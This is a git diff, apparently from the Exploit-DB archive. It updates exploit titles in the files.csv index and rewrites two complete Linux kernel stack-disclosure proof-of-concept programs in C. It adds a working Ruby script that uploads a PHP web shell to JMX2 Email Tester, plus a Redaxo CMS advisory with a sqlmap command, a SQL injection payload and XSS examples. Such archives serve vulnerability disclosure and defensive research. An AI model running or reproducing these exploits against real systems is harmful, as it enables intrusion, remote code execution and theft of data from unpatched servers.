diff --git a/files.csv b/files.csv index 13faba61a..cf6cf6586 100755 --- a/files.csv +++ b/files.csv @@ -8825,7 +8825,7 @@ id,file,description,date,author,platform,type,port 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 (index.php more) SQL Injection Vulnerability",2009-08-03,"Salvatore Fresta",php,webapps,0 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (shop.htm cid) SQL Injection Vulnerability",2009-08-03,ZoRLu,php,webapps,0 -9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0 +9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability",2009-08-04,SirGod,php,webapps,0 9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0 9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 (/_css/js.php) Local File Inclusion Vulnerability",2009-08-04,eLwaux,php,webapps,0 @@ -8978,7 +8978,7 @@ id,file,description,date,author,platform,type,port 9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 (sid) SQL Injection Vulnerability",2009-08-25,v3n0m,php,webapps,0 9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2009-08-25,Red-D3v1L,php,webapps,0 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0 -9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0 +9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0 9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)",2009-08-25,"Francis Provencher",windows,dos,0 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0 @@ -8986,7 +8986,7 @@ id,file,description,date,author,platform,type,port 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0 9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0 -9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0 +9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0 9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 (bsql/lfi) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0 @@ -13186,7 +13186,7 @@ id,file,description,date,author,platform,type,port 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0 -15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0 +15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 - pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass Vulnerability",2010-09-29,"silent vapor",php,webapps,0 @@ -18363,8 +18363,8 @@ id,file,description,date,author,platform,type,port 21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 File Retrieval Vulnerability",2001-08-31,"Hannibal Lector",cgi,remote,0 21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability",2001-12-11,Camisade,windows,local,0 21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 Insecure Password Vulnerability",2001-08-15,"Macintosh Security",osx,local,0 -21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privelege Elevation",2001-08-15,Indigo,windows,local,0 -21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0 +21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0 +21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0 21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 Error Message Information Disclosure Vulnerability",2001-08-16,LoWNOISE,unix,local,0 21074,platforms/unix/dos/21074.pl,"glFTPD 1.x LIST Denial of Service Vulnerability",2001-08-17,"ASGUARD LABS",unix,dos,0 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution Vulnerability",2001-08-02,"Maurycy Prodeus ",linux,remote,0 @@ -29228,7 +29228,7 @@ id,file,description,date,author,platform,type,port 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0 32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0 32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80 -32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22 +32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0 32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow Vulnerability",2008-09-29,Ciph3r,windows,remote,0 32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting Vulnerability",2008-09-29,"Alexander Klink",php,webapps,0 @@ -35694,3 +35694,5 @@ id,file,description,date,author,platform,type,port 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0 39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / CSRF",2016-02-16,hyp3rlinx,php,webapps,0 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0 +39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0 +39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80 diff --git a/platforms/linux/local/9352.c b/platforms/linux/local/9352.c index 16a8d3a48..77aa1716e 100755 --- a/platforms/linux/local/9352.c +++ b/platforms/linux/local/9352.c @@ -1,121 +1,121 @@ -/* - * sigaltstack-leak.c - * - * Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856 - * - * Ulrich Drepper correctly points out that there is generally padding in - * the structure on 64-bit hosts, and that copying the structure from - * kernel to user space can leak information from the kernel stack in those - * padding bytes. - * - * Notes: - * - * Only 4 bytes of uninitialized kernel stack are leaked in the padding - * between stack_t's ss_flags and ss_size. The disclosure only affects - * affects 64-bit hosts. - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -const int randcalls[] = { - 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16, - 21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73, - 78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108, - 109, 110, 11, 112, 113, 114, 116, 117, 118, 119, - 120, 121, 121, 123, 124, 125, 140, 141, 143, 146 -}; - -void -dump(const unsigned char *p, unsigned l) -{ - printf("stack_t:"); - while (l > 0) { - printf(" "); - if (l == 12) { - printf("*** "); - } - printf("%02x", *p); - if (l == 9) { - printf(" ***"); - } - ++p; --l; - } - printf("\n"); -} - -int -main(void) -{ - char *p; - int call, ret; - size_t size, ftest, stest; - stack_t oss; - - size = sizeof(stack_t); - - printf("[+] Checking platform...\n"); - - if (size == 24) { - printf("[+] sizeof(stack_t) = %zu\n", size); - printf("[+] Correct size, 64-bit platform.\n"); - } else { - printf("[-] sizeof(stack_t) = %zu\n", size); - printf("[-] Error: you do not appear to be on a 64-bit platform.\n"); - printf("[-] No information disclosure is possible.\n"); - exit(1); - } - - ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags); - stest = offsetof(stack_t, ss_size); - - printf("[+] Checking for stack_t hole...\n"); - - if (ftest != stest) { - printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest); - printf("[+] Hole in stack_t present!\n", ftest, stest); - } else { - printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest); - printf("[-] Error: No hole in stack_t, something is quite wrong.\n"); - exit(1); - } - - printf("[+] Ready to call sigaltstack.\n\n"); - - for (ret = 5; ret > 0; ret--) { - printf("%d...\n", ret); - sleep(1); - } - srand(time(NULL)); - - while (1) { - /* random stuff to make stack pseudo-interesting */ - call = rand() % (sizeof(randcalls) / sizeof(int)); - syscall(randcalls[call]); - - ret = sigaltstack(NULL, &oss); - if (ret != 0) { - printf("[-] Error: sigaltstack failed.\n"); - exit(1); - } - - dump((unsigned char *) &oss, sizeof(oss)); - } - - return 0; -} - -// milw0rm.com [2009-08-04] +/* + * sigaltstack-leak.c + * + * Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856 + * + * Ulrich Drepper correctly points out that there is generally padding in + * the structure on 64-bit hosts, and that copying the structure from + * kernel to user space can leak information from the kernel stack in those + * padding bytes. + * + * Notes: + * + * Only 4 bytes of uninitialized kernel stack are leaked in the padding + * between stack_t's ss_flags and ss_size. The disclosure only affects + * affects 64-bit hosts. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +const int randcalls[] = { + 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16, + 21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73, + 78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108, + 109, 110, 11, 112, 113, 114, 116, 117, 118, 119, + 120, 121, 121, 123, 124, 125, 140, 141, 143, 146 +}; + +void +dump(const unsigned char *p, unsigned l) +{ + printf("stack_t:"); + while (l > 0) { + printf(" "); + if (l == 12) { + printf("*** "); + } + printf("%02x", *p); + if (l == 9) { + printf(" ***"); + } + ++p; --l; + } + printf("\n"); +} + +int +main(void) +{ + char *p; + int call, ret; + size_t size, ftest, stest; + stack_t oss; + + size = sizeof(stack_t); + + printf("[+] Checking platform...\n"); + + if (size == 24) { + printf("[+] sizeof(stack_t) = %zu\n", size); + printf("[+] Correct size, 64-bit platform.\n"); + } else { + printf("[-] sizeof(stack_t) = %zu\n", size); + printf("[-] Error: you do not appear to be on a 64-bit platform.\n"); + printf("[-] No information disclosure is possible.\n"); + exit(1); + } + + ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags); + stest = offsetof(stack_t, ss_size); + + printf("[+] Checking for stack_t hole...\n"); + + if (ftest != stest) { + printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest); + printf("[+] Hole in stack_t present!\n", ftest, stest); + } else { + printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest); + printf("[-] Error: No hole in stack_t, something is quite wrong.\n"); + exit(1); + } + + printf("[+] Ready to call sigaltstack.\n\n"); + + for (ret = 5; ret > 0; ret--) { + printf("%d...\n", ret); + sleep(1); + } + srand(time(NULL)); + + while (1) { + /* random stuff to make stack pseudo-interesting */ + call = rand() % (sizeof(randcalls) / sizeof(int)); + syscall(randcalls[call]); + + ret = sigaltstack(NULL, &oss); + if (ret != 0) { + printf("[-] Error: sigaltstack failed.\n"); + exit(1); + } + + dump((unsigned char *) &oss, sizeof(oss)); + } + + return 0; +} + +// milw0rm.com [2009-08-04] diff --git a/platforms/linux/local/9513.c b/platforms/linux/local/9513.c index 78d8b1a3a..f879bf739 100755 --- a/platforms/linux/local/9513.c +++ b/platforms/linux/local/9513.c @@ -1,146 +1,146 @@ -/* - * llc-getsockname-leak.c - * - * Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc - * - * sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc - * before copying to the above layer's structure. - * - * Notes: - * - * Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4 - * as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5 - * bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname(). - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#ifndef AF_LLC -#define AF_LLC 26 -#endif - -#ifndef AF_LLC -#define AF_LLC 26 -#endif - -#ifndef LLC_SAP_NULL -#define LLC_SAP_NULL 0x00 -#endif - -#ifndef __LLC_SOCK_SIZE__ -#define __LLC_SOCK_SIZE__ 16 -struct sockaddr_llc { - sa_family_t sllc_family; - sa_family_t sllc_arphrd; - unsigned char sllc_test; - unsigned char sllc_xid; - unsigned char sllc_ua; - unsigned char sllc_sap; - unsigned char sllc_mac[6]; - unsigned char __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 - - sizeof(unsigned char) * 4 - 6]; -}; -#endif - -const int randcalls[] = { - __NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat, - __NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl, - __NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup, - __NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl, - __NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday, - __NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid, - __NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid, - __NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority, - __NR_sched_getparam, __NR_sched_get_priority_max -}; - -void -dump(const unsigned char *p, unsigned l) -{ - printf("sockaddr_llc:"); - while (l > 0) { - printf(" "); - if (l == 12 || l == 2) { - printf("*** "); - } - printf("%02x", *p); - if (l == 10 || l == 1) { - printf(" ***"); - } - ++p; --l; - } - printf("\n"); -} - -int -main(void) -{ - struct sockaddr_llc sllc; - int ret, sock, call, sllc_len = sizeof(sllc); - - printf("[+] Creating AF_LLC socket.\n"); - - sock = socket(AF_LLC, SOCK_DGRAM, 0); - if (sock == -1) { - printf("[-] Error: Couldn't create AF_LLC socket.\n"); - printf("[-] %s.\n", strerror(errno)); - exit(1); - } - - memset(&sllc, 0, sllc_len); - - sllc.sllc_family = AF_LLC; - sllc.sllc_arphrd = ARPHRD_ETHER; - sllc.sllc_sap = LLC_SAP_NULL; - - printf("[+] Dummy sendto to autobind socket.\n"); - - ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len); - if (ret == -1) { - printf("[-] Error: sendto failed.\n"); - printf("[-] %s.\n", strerror(errno)); - exit(1); - } - - printf("[+] Ready to call getsockname.\n\n"); - - for (ret = 5; ret > 0; ret--) { - printf("%d...\n", ret); - sleep(1); - } - srand(time(NULL)); - - while (1) { - /* random stuff to make stack pseudo-interesting */ - call = rand() % (sizeof(randcalls) / sizeof(int)); - syscall(randcalls[call]); - - ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len); - if (ret != 0) { - printf("[-] Error: getsockname failed.\n"); - printf("[-] %s.\n", strerror(errno)); - exit(1); - } - - dump((unsigned char *) &sllc, sizeof(sllc)); - } - - return 0; -} - -// milw0rm.com [2009-08-25] +/* + * llc-getsockname-leak.c + * + * Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc + * + * sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc + * before copying to the above layer's structure. + * + * Notes: + * + * Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4 + * as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5 + * bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname(). + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifndef AF_LLC +#define AF_LLC 26 +#endif + +#ifndef AF_LLC +#define AF_LLC 26 +#endif + +#ifndef LLC_SAP_NULL +#define LLC_SAP_NULL 0x00 +#endif + +#ifndef __LLC_SOCK_SIZE__ +#define __LLC_SOCK_SIZE__ 16 +struct sockaddr_llc { + sa_family_t sllc_family; + sa_family_t sllc_arphrd; + unsigned char sllc_test; + unsigned char sllc_xid; + unsigned char sllc_ua; + unsigned char sllc_sap; + unsigned char sllc_mac[6]; + unsigned char __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 - + sizeof(unsigned char) * 4 - 6]; +}; +#endif + +const int randcalls[] = { + __NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat, + __NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl, + __NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup, + __NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl, + __NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday, + __NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid, + __NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid, + __NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority, + __NR_sched_getparam, __NR_sched_get_priority_max +}; + +void +dump(const unsigned char *p, unsigned l) +{ + printf("sockaddr_llc:"); + while (l > 0) { + printf(" "); + if (l == 12 || l == 2) { + printf("*** "); + } + printf("%02x", *p); + if (l == 10 || l == 1) { + printf(" ***"); + } + ++p; --l; + } + printf("\n"); +} + +int +main(void) +{ + struct sockaddr_llc sllc; + int ret, sock, call, sllc_len = sizeof(sllc); + + printf("[+] Creating AF_LLC socket.\n"); + + sock = socket(AF_LLC, SOCK_DGRAM, 0); + if (sock == -1) { + printf("[-] Error: Couldn't create AF_LLC socket.\n"); + printf("[-] %s.\n", strerror(errno)); + exit(1); + } + + memset(&sllc, 0, sllc_len); + + sllc.sllc_family = AF_LLC; + sllc.sllc_arphrd = ARPHRD_ETHER; + sllc.sllc_sap = LLC_SAP_NULL; + + printf("[+] Dummy sendto to autobind socket.\n"); + + ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len); + if (ret == -1) { + printf("[-] Error: sendto failed.\n"); + printf("[-] %s.\n", strerror(errno)); + exit(1); + } + + printf("[+] Ready to call getsockname.\n\n"); + + for (ret = 5; ret > 0; ret--) { + printf("%d...\n", ret); + sleep(1); + } + srand(time(NULL)); + + while (1) { + /* random stuff to make stack pseudo-interesting */ + call = rand() % (sizeof(randcalls) / sizeof(int)); + syscall(randcalls[call]); + + ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len); + if (ret != 0) { + printf("[-] Error: getsockname failed.\n"); + printf("[-] %s.\n", strerror(errno)); + exit(1); + } + + dump((unsigned char *) &sllc, sizeof(sllc)); + } + + return 0; +} + +// milw0rm.com [2009-08-25] diff --git a/platforms/multiple/webapps/39456.rb b/platforms/multiple/webapps/39456.rb new file mode 100755 index 000000000..eccb6c044 --- /dev/null +++ b/platforms/multiple/webapps/39456.rb @@ -0,0 +1,45 @@ +# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php) +# Date: 2016-02-15 +# Blog: http://www.hahwul.com +# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester +# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip +# Tested on: debian [wheezy] +# CVE : none + +require "net/http" +require "uri" +require 'uri-handler' + +if ARGV.length != 2 + +puts "JMX2 Email Tester Web Shell Uploader" +puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]" +puts " targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester" +puts " phpCode(ex): echo 'zzzzz'" +puts " Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'" +puts " Install GEM: #> gem install uri-handler" +puts " exploit & code by hahwul[www.hahwul.com]" +else +target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/ +shell = ARGV[1] # PHP Code +shell = shell.to_uri +exp_url = target_url + "/models/save_email.php" +puts shell +uri = URI.parse(exp_url) +http = Net::HTTP.new(uri.host, uri.port) +puts exp_url +request = Net::HTTP::Post.new(uri.request_uri) +request["Accept-Encoding"] = "gzip, deflate" +request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/" +request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0" +request["Accept"] = "application/json, text/javascript, */*; q=0.01" +request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" +request["Connection"] = "keep-alive" +request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"}) +response = http.request(request) + +puts "[Result] Status code: "+response.code +puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php" +end + + diff --git a/platforms/php/webapps/39459.txt b/platforms/php/webapps/39459.txt new file mode 100755 index 000000000..e985e769a --- /dev/null +++ b/platforms/php/webapps/39459.txt @@ -0,0 +1,70 @@ +=== LSE Leading Security Experts GmbH - Security Advisory 2016-01-18 === + +Redaxo CMS contains multiple vulnerabilities +------------------------------------------------------------- + +Problem Overview +================ +Technical Risk: high +Likelihood of Exploitation: medium +Vendor: https://www.redaxo.org/ +Tested version: Redaxo CMS v5.0.0 +Credits: LSE Leading Security Experts GmbH employee Tim Herres +Advisory URL: https://www.lsexperts.de/advisories/lse-2016-01-18.txt +Advisory Status: Public +CVE-Number: na + +Impact +====== +Redaxo is an easy to use open source content management system. A user can create his own website using the Redaxo CMS. +During internal research, multiple vulnerabilities were identified in the Redaxo CMS software. +The software is vulnerable to an SQL-Injection attack, allowing an authenticated user to access the database in an unsafe way. +Some parts of the application do not have sufficient input validation and output encoding. This means user supplied input is inserted in an unsafe way +resulting in a Cross Site Scripting vulnerability. + +Issue Description +================= +The following vulnerabilities are only examples. It is highly recommended to check the whole application for similar vulnerabilities. +1) SQL Injection in the "Mediapool" component: +Authentication required: yes +User needs access to the "Mediapool". + +POC: +Exploitation using SQL Map +sqlmap -u "https://127.0.0.1/redaxo/index.php?page=mediapool%2fmedia&rex_file_category=0&media_name=blub&undefined=%0d" --cookie="PHPSESSID=h9s74l660iongtg71bpkjup0d1" -p media_name + +Parameter: media_name (GET) +Type: stacked queries +Title: MySQL > 5.0.11 stacked queries (SELECT - comment) +Payload: page=mediapool/media&rex_file_category=0&media_name=test');(SELECT * FROM (SELECT(SLEEP(5)))jbWV)#&undefined= + +2) Reflected XSS +Authentication required: yes +Used browser: FF42 +Example: +https://127.0.0.1/redaxo/index.php?page=mediapool/media&info=Datei+tot.&opener_input_field= + +3) Stored XSS (persistent XSS) +Authentication required: yes +Used browser: FF42 +It is possible to store JavaScript Code in input fields. +Example: +Menu --> "Mediapool" --> "Media Category Managing" --> Add --> Name field +Payload: +Response: +[...] +[...]href="index.php?page=mediapool/structure&cat_id=801">